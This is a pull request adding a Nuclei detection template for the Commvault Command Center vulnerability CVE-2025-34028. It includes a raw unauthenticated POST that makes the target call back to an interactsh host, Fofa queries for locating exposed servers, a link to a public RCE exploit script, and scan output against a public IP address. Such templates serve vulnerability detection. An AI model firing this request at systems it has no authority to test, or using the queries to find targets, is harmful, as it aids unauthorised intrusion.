### PR TITLE
Add CVE-2025-34028 Commvault RCE template

### DIFF
--- a/http/cves/2025/CVE-2025-34028.yaml
+++ b/http/cves/2025/CVE-2025-34028.yaml
@@ -1,19 +1,30 @@
 id: CVE-2025-34028
 
 info:
-  name: Commvault Command Center Remote Code Execution Vulnerability
-  author: abhishekrautela
+  name: Commvault - SSRF via /commandcenter/deployWebpackage.do
+  author: DhiyaneshDk,abhishekrautela
   severity: critical
   description: |
     A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
   reference:
+    - https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
     - https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
     - https://nvd.nist.gov/vuln/detail/CVE-2025-34028
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-34028
+    cwe-id: CWE-22
+    epss-score: 0.00202
+    epss-percentile: 0.42778
   metadata:
     verified: true
     max-request: 1
-    fofa-query: app="Commvault-WebServer"
-  tags: cve,cve2025,unauth,rce
+    fofa-query: icon_hash="1209838013"
+  tags: cve,cve2025,ssrf,oast,commvault
+
+variables:
+  string: "{{to_lower(rand_base(5))}}"
 
 http:
   - raw:
@@ -23,12 +34,11 @@ http:
         X-Requested-With: XMLHttpRequest
         Content-Type: application/x-www-form-urlencoded
 
-        commcellName={{interactsh-url}}&servicePack=nucleiTest&version=x
+        commcellName={{interactsh-url}}&servicePack={{string}}&version=x
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - dns
-
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
+          - 'status_code == 900'
+        condition: and

--- a/http/cves/2025/CVE-2025-34028.yaml
+++ b/http/cves/2025/CVE-2025-34028.yaml
@@ -1,0 +1,34 @@
+id: CVE-2025-34028
+
+info:
+  name: Commvault Command Center Remote Code Execution Vulnerability
+  author: abhishekrautela
+  severity: critical
+  description: |
+    A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
+  reference:
+    - https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34028
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="Commvault-WebServer"
+  tags: cve,cve2025,unauth,rce
+
+http:
+  - raw:
+      - |
+        POST /commandcenter/deployWebpackage.do HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        commcellName={{interactsh-url}}&servicePack=nucleiTest&version=x
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - dns
+


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2025-34028
- References:
- https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/

### Template Validation

I've validated this template locally?
- [* ] YES


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->

Fofa query: 
app="Commvault-WebServer"

### Additional References:
- https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028/blob/main/watchtowr-vs-commvault-rce-CVE-2025-34028.py
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

###Scan result###
 nuclei -t CVE-2025-34028.yaml --target https://51.8.138.192

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.2

                projectdiscovery.io

[INF] Current nuclei version: v3.4.2 (latest)
[INF] Current nuclei-templates version: v10.1.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 64
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.site
[CVE-2025-34028] [http] [critical] https://51.8.138.192/commandcenter/deployWebpackage.do
[CVE-2025-34028] [http] [critical] https://51.8.138.192/commandcenter/deployWebpackage.do


![image](https://github.com/user-attachments/assets/239ecfac-46e8-4925-adbd-abb686750183)
